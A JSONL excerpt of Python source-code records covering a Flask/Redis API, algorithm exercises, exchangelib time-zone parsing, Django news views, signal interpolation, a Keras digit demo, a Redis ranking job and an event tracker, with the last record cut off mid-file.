+{"seq_id":"461088222","text":"import flask\nfrom flask import request  # request is used in the /probability route below\nimport redis\nimport collections\nimport json\nimport numpy as np\n\napp = flask.Flask(__name__)\nconn = redis.Redis()\n\ndef buildHistogram():\n    keys = conn.keys() # gets keys [timestamps] from redis\n    values = conn.mget(keys) # gets the values for each time stamp\n    c = collections.Counter(values) # builds a histogram\n    z = sum(c.values())\n    return {k:v/float(z) for k,v in c.items()}\n\n@app.route(\"/\")\ndef histogram():\n    h = buildHistogram()\n    return json.dumps(h)\n\n@app.route(\"/entropy\")\ndef entropy():\n    h = buildHistogram()\n    # A Flask view must return str/bytes, not a bare float\n    return str(-sum([p*np.log(p) for p in h.values()]))\n\n@app.route(\"/probability\")\ndef probability():\n    city = request.args.get('city', '')\n    ref = request.args.get('referrer', '')\n    d = conn.hget(city,ref)\n    return d\n\n\n\n\n\nif __name__ == \"__main__\":\n    app.debug = True\n    app.run()\n","sub_path":"3/city-bot-api.py","file_name":"city-bot-api.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"227527229","text":"# https://leetcode.com/problems/longest-increasing-subsequence/discuss/74824/JavaPython-Binary-search-O(nlogn)-time-with-explanation\n# def LIS(arr):  # only length\n#     n = len(arr)\n#     tails = [0] * n\n#     size = 0\n#     for i in range(n):\n#         left = 0\n#         right = size\n#         while left < right:\n#             mid = (left + right) // 2\n#             if tails[mid] <= arr[i]:\n#                 left = mid + 1\n#             else:\n#                 right = mid\n#         tails[right] = arr[i]\n#         size = max(right + 1, size)\n#     return size\n\n\n# https://en.wikipedia.org/wiki/Longest_increasing_subsequence#Efficient_algorithms\n# def LIS(arr):\n#     n = len(arr)\n#     tails = [0] * n\n#     path = [-1] * n\n#     size = 0\n#     for i in range(n):\n#         left = 0\n#         right = size\n#         while left < right:\n#             mid = (left + right) // 2\n#             if arr[tails[mid]] <= arr[i]:\n#                 left = mid + 1\n#             else:\n#                 right = mid\n#         tails[right] = i\n#         if right > 0:\n#             path[i] = tails[right - 1]\n#\n#         size = max(right + 1, size)\n#     print(tails)\n#\n#     solution = []\n#     k = tails[size - 1]\n#     while k != -1:\n#         solution.append(arr[k])\n#         k = path[k]\n#     print(list(reversed(solution)))\n#     return size\n\n\ndef LIS(arr):\n    n = len(arr)\n    tails = [0] * n\n    size = 0\n    path = []\n    for i in range(n):\n        path.append([0])\n    for i in range(n):\n        if arr[i] < tails[0]:\n            tails[0] = arr[i]\n            path[0][0] = arr[i]\n        else:\n            left = 1\n            right = size\n            while left < right:\n                mid = (left + right) // 2\n                if tails[mid] <= arr[i]:\n                    left = mid + 1\n                else:\n                    right = mid\n            tails[right] = arr[i]\n            if right > 0:\n                path[right] = path[right - 1][:]\n                path[right].append(arr[i])\n            else:\n                path[0][0] = arr[i]\n            size = max(right + 1, size)\n    print(size)\n    print(path)\n    print(tails)\n    return size\n\n\ndef main():\n    arr = [5, 1, 2, 3, 3, 4, 2, 1, 2, 2, 3, 1]\n    # arr = [8, 9, 1, 2, 3, 4]\n    lis_length = LIS(arr)\n    print(lis_length)\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"15_4_6_LIS_nlogn.py","file_name":"15_4_6_LIS_nlogn.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"348963068","text":"import datetime\n\nfrom .common import EWSService\nfrom ..errors import NaiveDateTimeNotAllowed\nfrom ..ewsdatetime import EWSDateTime\nfrom ..fields import WEEKDAY_NAMES\nfrom ..util import create_element, set_xml_value, xml_text_to_value, peek, TNS, MNS\nfrom ..version import EXCHANGE_2010\n\n\nclass GetServerTimeZones(EWSService):\n \"\"\"MSDN:\n https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/getservertimezones-operation\n \"\"\"\n\n SERVICE_NAME = 'GetServerTimeZones'\n element_container_name = '{%s}TimeZoneDefinitions' % MNS\n supported_from = EXCHANGE_2010\n\n def call(self, timezones=None, return_full_timezone_data=False):\n return self._elems_to_objs(self._get_elements(payload=self.get_payload(\n timezones=timezones,\n return_full_timezone_data=return_full_timezone_data\n )))\n\n def get_payload(self, timezones, return_full_timezone_data):\n payload = create_element(\n 'm:%s' % self.SERVICE_NAME,\n attrs=dict(ReturnFullTimeZoneData='true' if return_full_timezone_data else 'false'),\n )\n if timezones is not None:\n is_empty, timezones = peek(timezones)\n if not is_empty:\n tz_ids = create_element('m:Ids')\n for timezone in timezones:\n tz_id = set_xml_value(create_element('t:Id'), timezone.ms_id, version=self.protocol.version)\n tz_ids.append(tz_id)\n payload.append(tz_ids)\n return payload\n\n def _elems_to_objs(self, elems):\n for elem in elems:\n if isinstance(elem, Exception):\n yield elem\n continue\n tz_id = elem.get('Id')\n tz_name = elem.get('Name')\n tz_periods = self._get_periods(elem)\n tz_transitions_groups = self._get_transitions_groups(elem)\n tz_transitions = self._get_transitions(elem)\n yield tz_id, tz_name, tz_periods, tz_transitions, tz_transitions_groups\n\n @staticmethod\n def _get_periods(timezonedef):\n tz_periods = {}\n periods = timezonedef.find('{%s}Periods' % TNS)\n for period in periods.findall('{%s}Period' % TNS):\n # Convert e.g. \"trule:Microsoft/Registry/W. 
Europe Standard Time/2006-Daylight\" to (2006, 'Daylight')\n p_year, p_type = period.get('Id').rsplit('/', 1)[1].split('-')\n tz_periods[(int(p_year), p_type)] = dict(\n name=period.get('Name'),\n bias=xml_text_to_value(period.get('Bias'), datetime.timedelta)\n )\n return tz_periods\n\n @staticmethod\n def _get_transitions_groups(timezonedef):\n tz_transitions_groups = {}\n transitiongroups = timezonedef.find('{%s}TransitionsGroups' % TNS)\n if transitiongroups is not None:\n for transitiongroup in transitiongroups.findall('{%s}TransitionsGroup' % TNS):\n tg_id = int(transitiongroup.get('Id'))\n tz_transitions_groups[tg_id] = []\n for transition in transitiongroup.findall('{%s}Transition' % TNS):\n # Apply same conversion to To as for period IDs\n to_year, to_type = transition.find('{%s}To' % TNS).text.rsplit('/', 1)[1].split('-')\n tz_transitions_groups[tg_id].append(dict(\n to=(int(to_year), to_type),\n ))\n for transition in transitiongroup.findall('{%s}RecurringDayTransition' % TNS):\n # Apply same conversion to To as for period IDs\n to_year, to_type = transition.find('{%s}To' % TNS).text.rsplit('/', 1)[1].split('-')\n occurrence = xml_text_to_value(transition.find('{%s}Occurrence' % TNS).text, int)\n if occurrence == -1:\n # See TimeZoneTransition.from_xml()\n occurrence = 5\n tz_transitions_groups[tg_id].append(dict(\n to=(int(to_year), to_type),\n offset=xml_text_to_value(transition.find('{%s}TimeOffset' % TNS).text, datetime.timedelta),\n iso_month=xml_text_to_value(transition.find('{%s}Month' % TNS).text, int),\n iso_weekday=WEEKDAY_NAMES.index(transition.find('{%s}DayOfWeek' % TNS).text) + 1,\n occurrence=occurrence,\n ))\n return tz_transitions_groups\n\n @staticmethod\n def _get_transitions(timezonedef):\n tz_transitions = {}\n transitions = timezonedef.find('{%s}Transitions' % TNS)\n if transitions is not None:\n for transition in transitions.findall('{%s}Transition' % TNS):\n to = transition.find('{%s}To' % TNS)\n if to.get('Kind') != 'Group':\n raise ValueError('Unexpected \"Kind\" XML attr: %s' % to.get('Kind'))\n tg_id = xml_text_to_value(to.text, int)\n tz_transitions[tg_id] = None\n for transition in transitions.findall('{%s}AbsoluteDateTransition' % TNS):\n to = transition.find('{%s}To' % TNS)\n if to.get('Kind') != 'Group':\n raise ValueError('Unexpected \"Kind\" XML attr: %s' % to.get('Kind'))\n tg_id = xml_text_to_value(to.text, int)\n try:\n t_date = xml_text_to_value(transition.find('{%s}DateTime' % TNS).text, EWSDateTime).date()\n except NaiveDateTimeNotAllowed as e:\n # We encountered a naive datetime. Don't worry. 
we just need the date\n t_date = e.local_dt.date()\n tz_transitions[tg_id] = t_date\n return tz_transitions\n","sub_path":"exchangelib/services/get_server_time_zones.py","file_name":"get_server_time_zones.py","file_ext":"py","file_size_in_byte":5752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"30543405","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import Haberler, Kategori\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n# Create your views here.\ndef anasayfa(request):\n post_list=Haberler.objects.all()\n query=request.GET.get('q')\n if query:\n post_list=post_list.filter(title__icontains=query)\n paginator = Paginator(post_list, 10) # Show 25 contacts per page\n\n page = request.GET.get('sayfa')\n try:\n post_list = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n post_list = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n post_list = paginator.page(paginator.num_pages)\n\n categori=Kategori.objects.get(id=1)\n categori_list=categori.posts.all()\n paginator = Paginator(categori_list, 5) # Show 25 contacts per page\n\n page = request.GET.get('page')\n try:\n categori_list = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n categori_list = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n categori_list = paginator.page(paginator.num_pages)\n\n context={'list':post_list,'categori_list':categori_list,}\n return render(request, 'index.html', context)\n\ndef gundem(request):\n post=Kategori.objects.get(id=1)\n liste=post.posts.all()\n context={\n 'liste':liste,\n }\n return render(request, 'gundem.html', context)\n\ndef ekonomi(request):\n post=Kategori.objects.get(id=2)\n veri=post.posts.all()\n context={\n 'veri':veri,\n }\n return render(request, 'ekonomi.html', context)\n\ndef siyaset(request):\n post=Kategori.objects.get(id=3)\n veri=post.posts.all()\n context={\n 'veri':veri,\n }\n return render(request, 'siyaset.html', context)\n\ndef spor(request):\n post=Kategori.objects.get(id=4)\n veri=post.posts.all()\n context={\n 'veri':veri,\n }\n return render(request, 'spor.html', context)\n\ndef detail(request, id):\n kayit=get_object_or_404(Haberler, id=id)\n context={\n 'gelenveri':kayit,\n }\n return render(request, 'detail.html', context) ","sub_path":"uygulama/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"420834194","text":"\ndef upsample(x,M):\n import numpy as np\n \n output = np.hstack((x.reshape(len(x),1),np.zeros((len(x),M-1))))\n return output.flatten()\n\ndef sinc_interp(x, s, u):\n \"\"\"\n Taken from endolith's github\n \n Interpolates x, sampled at \"s\" instants\n Output y is sampled at \"u\" instants (\"u\" for \"upsampled\")\n \n from Matlab:\n http://phaseportrait.blogspot.com/2008/06/sinc-interpolation-in-matlab.html \n \"\"\"\n \n import numpy as np\n \n assert len(x) == len(s), 'x and s must be the same length'\n \n # Find the period \n T = s[1] - s[0]\n \n sincM = np.tile(u, (len(s), 1)) - np.tile(s[:, np.newaxis], (1, len(u)))\n y = np.dot(x, np.sinc(sincM/T))\n return y\n\n\nif __name__=='__main__':\n import numpy as np\n\n from matplotlib import pyplot as plt\n from scipy import signal\n from 
random import randint\n\n from filter_ir import *\n \n sample_rate=32e3\n samples_per_symbol=8\n m=4 #constelation size\n num_sym=64 #number of symbols\n\n symbol_map={0:(-1.0,-1.0),1:(-1.0,1.0),2:(1.0,-1.0),3:(1.0,1.0)}\n\n rrc_ir=root_raised_cos(samples_per_symbol,0.35,M=6) \n \n data=np.array([randint(0,m-1) for tmp in range(num_sym)])\n IQ_n1=np.pad(np.array([symbol_map[x][0]+symbol_map[x][1]*1j for x in data]),10,mode='constant')\n \n IQ_n2=upsample(IQ_n1,samples_per_symbol)\n\n IQ_n3=signal.convolve(IQ_n2,rrc_ir,mode='same')\n IQ_n4=signal.convolve(IQ_n3,rrc_ir,mode='same')/samples_per_symbol\n\n Ns=np.arange(0,len(IQ_n4))\n \n u=np.linspace(0,len(Ns),num=len(Ns))\n Y=sinc_interp(IQ_n4,Ns-15.1,u)\n\n plt.plot(Ns,IQ_n4.real)\n plt.plot(u,Y.real)\n plt.show()\n \n","sub_path":"sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"650913987","text":"#!/usr/bin/env python3\n#\n# Handwritten figures recognition => classification\n# also see https://www.tensorflow.org/api_docs/python/tf/keras and similar pages.\n#\n# Similar to sample.05.1.py, but with YOUR own images.\n# Model training.h5 must already exist\n#\n# Great doc at https://medium.com/@ashok.tankala/build-the-mnist-model-with-your-own-handwritten-digits-using-tensorflow-keras-and-python-f8ec9f871fd3\n#\n# Interactive: https://ashok.tanka.la/assets/examples/mnist/mnist.html\n#\n# pip install opencv-python\n#\nimport tensorflow as tf\nimport numpy as np\nimport sys\nimport warnings\n# Python Imaging Library.\n# If 'pip install PIL' fails, try 'pip install Pillow'\nfrom PIL import Image\nimport subprocess as sp\nimport platform\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\nsys.path.append('../')\nimport tf_utils\n\nwarnings.filterwarnings('ignore')\n\ntf_version = tf.__version__\nprint(\"TensorFlow version\", tf_version)\nprint(\"Keras version\", tf.keras.__version__)\n\nprint(\"{} script arguments.\".format(len(sys.argv)))\n\nsess = tf_utils.get_TF_session()\ndevices = sess.list_devices()\nprint(\"----- D E V I C E S -----\")\nfor d in devices:\n print(d.name)\nprint(\"-------------------------\")\n\nmodel = None\ntry:\n model = tf.keras.models.load_model('training.h5')\n print(\">> Model is now loaded\")\nexcept OSError:\n print('Model not found?')\n sys.exit(1)\n\nkeepLooping = True\nprint(\"Type Q or q to exit the loop\")\nwhile keepLooping:\n userInput = input(\"Enter the image file name (Q to quit) > \")\n if userInput != 'Q' and userInput != 'q':\n try:\n img = Image.open(userInput).convert(\"L\")\n img = np.resize(img, (28, 28, 1))\n im2arr = np.array(img)\n im2arr = im2arr.reshape(1, 28, 28, 1)\n pred = model.predict_classes(im2arr)\n precision = model.predict(im2arr)\n print(\"Prediction: it looks like a \", pred, \" (\", precision[0][np.argmax(precision)] * 100, \"% sure ), Nb predictions:\", len(precision))\n if platform.system() == 'Darwin':\n # for voice list, see https://gist.github.com/mculp/4b95752e25c456d425c6\n # also, try 'say -v ?'\n sp.run(['say',\n 'It looks like a ' + np.array2string(pred) + ' to me, I\\'m {:2.0f}% sure'.format(precision[0][np.argmax(precision)] * 100)])\n plt.imshow(mpimg.imread(userInput))\n # plt.imshow(img, cmap=plt.cm.binary)\n plt.show()\n except FileNotFoundError:\n print(\"File\", userInput, \"not found...\")\n else:\n keepLooping = 
False\n\nprint(\"Bye!\")\n","sub_path":"JupyterNotebooks/deep.learning.crash.course/digit.demo/sample.05.2.save.py","file_name":"sample.05.2.save.py","file_ext":"py","file_size_in_byte":2619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"74341802","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nimport numpy as np\nfrom lfpcluster import LFPCluster\nfrom scipy.io import loadmat\nfrom scipy.cluster.hierarchy import dendrogram, linkage\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n# Load dataset\ndata = loadmat('../data/F141020-lfp-5min-1kHz.mat')\n\nZ_pre = data['pre_pmcao'] # Extract pre-stroke data\nZ_post = data['post_pmcao'] # Extract post-stroke data\n\n\ndef plot_dendrogram(Z_clust, bad_channels=None, max_d=None):\n    if bad_channels is None:\n        labels = [i for i in range(1, 33)]\n    else:\n        labels = [i for i in range(1, 33) if i not in bad_channels]\n\n    dend = dendrogram(Z_clust, color_threshold=1, labels=labels)\n    if max_d:\n        plt.axhline(y=max_d, c='k')\n    plt.show()\n    \n\n# Bad channels\n#bad_channels = np.array([5, 8, 9, 12, 16, 26])\nbad_channels = {5, 8, 9, 12, 16, 26}\n\nrate = 1000\npre_cluster = LFPCluster(Z_pre, rate, bad_channels)\n\nnum_epochs = 300\npre_cluster.standardize_lfp(num_epochs)\nZpre_clust, my_clusters = pre_cluster.get_clusters(k=4, epoch=1)\nplot_dendrogram(Zpre_clust, bad_channels, max_d=0.8)\n\n#pre_cluster.plot_clusters(epoch=1)\n\nepochs_exc_chs_11_15_16 = {54, 63, 64, 114, 115, 116, 117, 136, 137,\n                           138, 139, 140, 141, 151, 152, 153, 154, 161,\n                           162, 163, 164, 165, 166, 167, 168, 182, 183,\n                           184, 185, 186, 187, 200, 201, 202, 203, 204,\n                           205, 206, 207, 208, 223, 224, 237, 238, 239,\n                           240, 296, 297}\nepochs_exc_chs_15_16 = {62, 65, 66}\nepochs_exc_chs_11_16 = {236, 241, 243}\nepochs_exc_chs_16 = {171, 172}\nepochs_exc_chs_11 = {119}\n\npost_clust = LFPCluster(Z_post, rate, bad_channels)\n\n#for i in range(1, 301):\n#    if i in epochs_exc_chs_11_15_16:\n#        ex_chs = {10, 14, 15}\n#    elif i in epochs_exc_chs_15_16:\n#        ex_chs = {14, 15}\n#    elif i in epochs_exc_chs_11_16:\n#        ex_chs = {10, 15}\n#    elif i in epochs_exc_chs_16:\n#        ex_chs = {15}\n#    elif i in epochs_exc_chs_11:\n#        ex_chs = {10}\n#    else:\n#        ex_chs = None\n#\n#    my_post_clusters = post_clust.get_clusters(k=4, epoch=i, ex_chs=ex_chs)\n#    post_clust.plot_clusters(epoch=i, clusters=my_post_clusters)\n#    fname = 'post_cluster_epoch_{}.png'.format(i+1)\n#    plt.savefig(fname, bbox_inches='tight')\n#    plt.close()\n\n\n","sub_path":"brainviz/lfpcluster/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"590118375","text":"# coding=utf-8\n\n\"\"\"\nA. Only works of the normal type are shown; conference-type works are not.\nB. Drawn from the work's primary category; viewpoint works are not shown.\nC. Sorted by weekly > monthly > overall popularity in descending order, hottest\n   first; returns as many as are available, at most 3.\n\nUpdate schedule: once per hour\n\"\"\"\n\nfrom util import redis_util\nimport dbutil\nfrom config_default import *\n\nconn = dbutil.connect(DB_URL)\nr = redis_util.get_redis()\n\nWORKS_CATEGORY_KEY = 'ks_web:live:works:category:%s'\n\nsql = '''\n    SELECT ltt.live_id,\n        ltt.type_name,\n        SUM(ltt.hot_index) AS hot_index\n    FROM\n    (\n        SELECT\n            lhr.live_id,\n            l_type.type_name,\n            IF (\n                sum(lhr.heart_count) * 10 > lt.live_duration,\n                lt.live_duration,\n                sum(lhr.heart_count) * 10\n            ) AS hot_index\n        FROM\n            ks_live.live_task lt\n        INNER JOIN ks_data_statistics.live_heart_record lhr ON lt.id = lhr.live_id\n        LEFT JOIN ks_live.live_task_type ltt ON ltt.live_task_id = lt.id AND ltt.`level` = 1\n        LEFT JOIN ks_live.live_type 
l_type ON l_type.id = ltt.type_id\n        WHERE\n            lhr.live_id > 0\n        AND lt.works_status = 2\n        AND lt.live_type = 0\n        %s\n        GROUP BY lhr.live_id, lhr.uid\n    ) ltt\n    GROUP BY\n        ltt.live_id\n    ORDER BY ltt.type_name DESC, ltt.hot_index DESC\n'''\n\n\ndef main():\n    week_items = conn.all(sql % 'AND lhr.create_time > DATE_ADD(CURRENT_DATE, INTERVAL -7 DAY)')\n    month_items = conn.all(sql % 'AND lhr.create_time > DATE_ADD(CURRENT_DATE, INTERVAL -30 DAY)')\n    total_items = conn.all(sql % '')\n\n    live_dict = {}\n    for item in week_items:\n        live_id = item['live_id']\n        type_name = item['type_name']\n        hot_index = item['hot_index']\n\n        live_dict.setdefault(live_id, {})\n        live_dict[live_id]['type_name'] = type_name\n        live_dict[live_id]['week_hot_index'] = hot_index\n    for item in month_items:\n        live_id = item['live_id']\n        type_name = item['type_name']\n        hot_index = item['hot_index']\n\n        live_dict.setdefault(live_id, {})\n        live_dict[live_id]['type_name'] = type_name\n        live_dict[live_id]['month_hot_index'] = hot_index\n    for item in total_items:\n        live_id = item['live_id']\n        type_name = item['type_name']\n        hot_index = item['hot_index']\n\n        live_dict.setdefault(live_id, {})\n        live_dict[live_id]['type_name'] = type_name\n        live_dict[live_id]['total_hot_index'] = hot_index\n\n    live_arr = []\n    for live_id in live_dict.keys():\n        live_arr.append({\n            'live_id': live_id,\n            'type_name': live_dict[live_id]['type_name'],\n            'week_hot_index': live_dict[live_id].get('week_hot_index', 0),\n            'month_hot_index': live_dict[live_id].get('month_hot_index', 0),\n            'total_hot_index': live_dict[live_id].get('total_hot_index', 0)\n        })\n\n    live_arr = sorted(live_arr, key=lambda x: (x['type_name'], -x['week_hot_index'],\n                                               -x['month_hot_index'], -x['total_hot_index']))\n\n    p = r.pipeline()\n    for l in live_arr:\n        live_id = l['live_id']\n        type_name = l['type_name']\n\n        sim_list = [x['live_id'] for x in live_arr if x['live_id'] != live_id and x['type_name'] == type_name][:3]\n\n        p.delete(WORKS_CATEGORY_KEY % live_id)\n        if len(sim_list) > 0:\n            p.rpush(WORKS_CATEGORY_KEY % live_id, *sim_list)\n    p.execute()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"task/live_category.py","file_name":"live_category.py","file_ext":"py","file_size_in_byte":3612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"622151658","text":"from time import struct_time as EventTimeImpl\nfrom enum import Enum\nfrom random import Random\nrandgen = Random()\n\ndef is_leap_year(year):\n    return (year - 2000) % 4 == 0\n\nmins_per_day = 24*60\ndef get_num_days_per_months(is_leap):\n    return [None,31,29 if is_leap else 28,31,30,31,30,31,31,30,31,30,31]\ndef fix_month_day(year,month,day):\n    return min(day,get_num_days_per_months(is_leap_year(year))[month])\n\nnum_mins_per_year = {}\n\nfor year in range(2010,2020):\n    res = 0\n    num_days_per_month = get_num_days_per_months(is_leap_year(year))\n    for month in range(1,13):\n        # Convert days to minutes; this dict stores minutes per year, not days\n        res += num_days_per_month[month] * mins_per_day\n    num_mins_per_year[year] = res\n\nEPOCH_YEAR = 2015 # Epoch is 2015-01-01 00:00\n\nclass EventTime:\n    def __init__(self,year=1970,month=1,day=1,hours=0,minutes=0,seconds=0):\n        '''\n        year (including century, e.g. 
1998)\n month (1-12)\n day (1-31)\n hours (0-23)\n minutes (0-59)\n seconds (0-59)\n weekday (0-6, Monday is 0)\n Julian day (day in the year, 1-366)\n DST (Daylight Savings Time) flag (-1, 0 or 1))\n '''\n self.year=year\n self.month=month\n self.day=day\n self.hours=hours\n self.minutes=minutes\n self.seconds=seconds\n def __str__(self):\n return '%04d-%02d-%02d %02d:%02d:%02d' % (self.year, self.month, self.day, self.hours, self.minutes, self.seconds)\n def get_impl(self):\n return EventTimeImpl(self.year,self.month,self.day,self.hours,self.minutes,self.seconds,0,1,0)\n def get_num_mins_this_year(self):\n num_mins = 0\n num_days_per_month = get_num_days_per_months(is_leap_year(self.year))\n for m in range(1,self.month):\n num_mins += num_days_per_month[m] * mins_per_day\n num_mins += (self.day - 1) * mins_per_day\n num_mins += self.hours * 60\n num_mins += self.minutes\n return num_mins\n def get_num_mins_till_epoch(self):\n result = 0\n for year in range(EPOCH_YEAR, self.year):\n result += num_mins_per_year[year]\n result += self.get_num_mins_this_year()\n return result\n\nclass eRegistryType:\n suspect = 'suspect'\n symptom = 'symptom'\n\nclass EventType:\n category = None\n def __init__(self, registry_type, name):\n self.registry_type = registry_type\n self.name = name\n def __str__(self):\n return self.category + '-' + self.name\n\nclass EventCategory:\n def __init__(self, registry_type, name):\n #assert isinstance(registry_type, eRegistryType)\n self.registry_type = registry_type\n self.name = name\n self.event_types = []\n def __str__(self):\n s = self.name + '\\n'\n l = len(self.event_types)\n for i in range(l):\n s += ' ' + str(self.event_types[i]) + ('\\n' if i != (l-1) else '')\n return s\n def add_event_type(self, event_type):\n event_type.category = self.name\n event_type.registry_type = self.registry_type\n self.event_types.append(event_type)\n\nclass EventRegistry:\n def __init__(self, registry_type):\n #assert isinstance(registry_type, eRegistryType)\n self.registry_type = registry_type\n if self.registry_type == eRegistryType.suspect:\n self.categories = []\n\n food = EventCategory(self.registry_type, 'food')\n food.add_event_type(EventType(self.registry_type, 'soup'))\n food.add_event_type(EventType(self.registry_type, 'bread'))\n food.add_event_type(EventType(self.registry_type, 'chocolate'))\n self.categories.append(food)\n\n food_prep = EventCategory(self.registry_type, 'food_preparation')\n food_prep.add_event_type(EventType(self.registry_type, 'baked'))\n food_prep.add_event_type(EventType(self.registry_type, 'cooked'))\n food_prep.add_event_type(EventType(self.registry_type, 'fried'))\n self.categories.append(food_prep)\n\n drinks = EventCategory(self.registry_type, 'drinks')\n drinks.add_event_type(EventType(self.registry_type, 'milk'))\n drinks.add_event_type(EventType(self.registry_type, 'water'))\n drinks.add_event_type(EventType(self.registry_type, 'cola'))\n drinks.add_event_type(EventType(self.registry_type, 'orange_juice'))\n self.categories.append(drinks)\n\n weather = EventCategory(self.registry_type, 'weather')\n weather.add_event_type(EventType(self.registry_type, 'rainy'))\n weather.add_event_type(EventType(self.registry_type, 'cold'))\n weather.add_event_type(EventType(self.registry_type, 'warm'))\n weather.add_event_type(EventType(self.registry_type, 'hot'))\n self.categories.append(weather)\n\n elif self.registry_type == eRegistryType.symptom:\n self.categories = []\n\n pain = EventCategory(self.registry_type, 'pain')\n 
pain.add_event_type(EventType(self.registry_type, 'head'))\n pain.add_event_type(EventType(self.registry_type, 'stomach'))\n self.categories.append(pain)\n\n mental = EventCategory(self.registry_type, 'mental')\n mental.add_event_type(EventType(self.registry_type, 'dizzy'))\n mental.add_event_type(EventType(self.registry_type, 'nausea'))\n self.categories.append(mental)\n\n mental = EventCategory(self.registry_type, 'toilet')\n mental.add_event_type(EventType(self.registry_type, 'normal'))\n mental.add_event_type(EventType(self.registry_type, 'bad'))\n self.categories.append(mental)\n\n else:\n raise Warning('Unknown registry type.')\n def __str__(self):\n s = ''\n l = len(self.categories)\n for i in range(l):\n s += ' ' + str(self.categories[i]) + ('\\n' if i != (l-1) else '')\n return s\n\n def add_category(self, cat):\n self.categories.append(cat)\n\n def get_random_event_type(self):\n cat_r = randgen.randint(0, len(self.categories)-1)\n cat = self.categories[cat_r]\n assert isinstance(cat, EventCategory)\n event_r = randgen.randint(0, len(cat.event_types) - 1)\n event = cat.event_types[event_r]\n assert isinstance(event, EventType)\n return event\n\nclass Event:\n def __init__(self, event_time, event_type):\n assert isinstance(event_time,EventTime)\n assert isinstance(event_type,EventType)\n self.event_time = event_time\n self.event_type = event_type\n def __str__(self):\n return\\\n str(self.event_time) + ' ' + str(self.event_type)\n\nclass EventsHolder:\n def __init__(self):\n self.events = {}\n def add_event(self, event):\n assert isinstance(event, Event)\n self.events[event.event_time.get_num_mins_till_epoch()] = event\n def __str__(self):\n s=''\n assert isinstance(self.events, dict)\n keys = [x for x in self.events.keys()]\n keys.sort()\n for key in keys:\n s += ' %06d | '%key + str(self.events[key]) + '\\n'\n return s\n def get_keys_in_range(self, start, end):\n return [x for x in self.events.keys() if (x >= start and x < end)]\n def get_keys_before_reference(self, ref, hours=0, mins=0, days=0):\n mins_before = days * mins_per_day + hours * 60 + mins\n return self.get_keys_in_range(ref-mins_before,ref)\n\nclass Suspicion:\n def __init__(self):\n self.occurrences = 0\n def __str__(self):\n return str(self.occurrences)\n\nclass SymptomResult:\n def __init__(self):\n self.occurrences = 0\n self.suspicions = {}\n def __str__(self):\n s = [(self.suspicions[x].occurrences, x) for x in self.suspicions]\n s.sort(reverse=True)\n return\\\n ' occur: ' + str(self.occurrences) + '\\n' +\\\n ' Suspects:\\n' +\\\n ' ' +\\\n '\\n '.join(['%02d (%s)'%(x[0],x[1]) for x in s])\n\nclass User:\n def __init__(self, id):\n self.id = id\n self.suspects = EventRegistry(eRegistryType.suspect)\n self.symptoms = EventRegistry(eRegistryType.symptom)\n self.symptoms_event_holder = EventsHolder()\n self.suspects_event_holder = EventsHolder()\n def add_category(self, cat):\n assert isinstance(cat, EventCategory)\n if cat.registry_type == eRegistryType.suspect:\n self.suspects.add_category(cat)\n elif cat.registry_type == eRegistryType.symptom:\n self.symptoms.add_category(cat)\n else:\n raise Warning('Unknown registry type.')\n def add_event(self, event):\n assert isinstance(event, Event)\n if event.event_type.registry_type == eRegistryType.suspect:\n self.suspects_event_holder.add_event(event)\n elif event.event_type.registry_type == eRegistryType.symptom:\n self.symptoms_event_holder.add_event(event)\n else:\n raise Warning('Unknown registry type.')\n def __str__(self):\n s = ''\n s += 'user: ' + self.id + 
'\\n'\n s += ' suspects:\\n' + str(self.suspects) + '\\n'\n s += ' symptoms:\\n' + str(self.symptoms) + '\\n'\n s += ' events (suspects):\\n' + str(self.suspects_event_holder) + '\\n'\n s += ' events (symptoms):\\n' + str(self.symptoms_event_holder) + '\\n'\n s += ' analyze result:\\n'\n for key in self.analyze_result:\n s += ' ' + key + ':\\n' + str(self.analyze_result[key]) + '\\n'\n return s\n def analyze_symptoms(self):\n self.analyze_result = {}\n\n # Iterate through the symptoms which were added as events to the calendar database.\n for symptom_mins in self.symptoms_event_holder.events:\n symptom_event = self.symptoms_event_holder.events[symptom_mins]\n assert isinstance(symptom_event, Event)\n\n symptom_id = str(symptom_event.event_type)\n if symptom_id not in self.analyze_result:\n self.analyze_result[symptom_id] = SymptomResult()\n self.analyze_result[symptom_id].occurrences += 1\n\n # Find suspects for the current symptom and modify the stats about that symptom.\n suspects_keys = self.suspects_event_holder.get_keys_before_reference(symptom_mins,hours=4)\n for suspects_key in suspects_keys:\n suspect_event = self.suspects_event_holder.events[suspects_key]\n suspect_id = str(suspect_event.event_type)\n if suspect_id not in self.analyze_result[symptom_id].suspicions:\n self.analyze_result[symptom_id].suspicions[suspect_id] = Suspicion()\n self.analyze_result[symptom_id].suspicions[suspect_id].occurrences += 1\n\n # for symptom_category in self.symptoms.categories:\n # assert 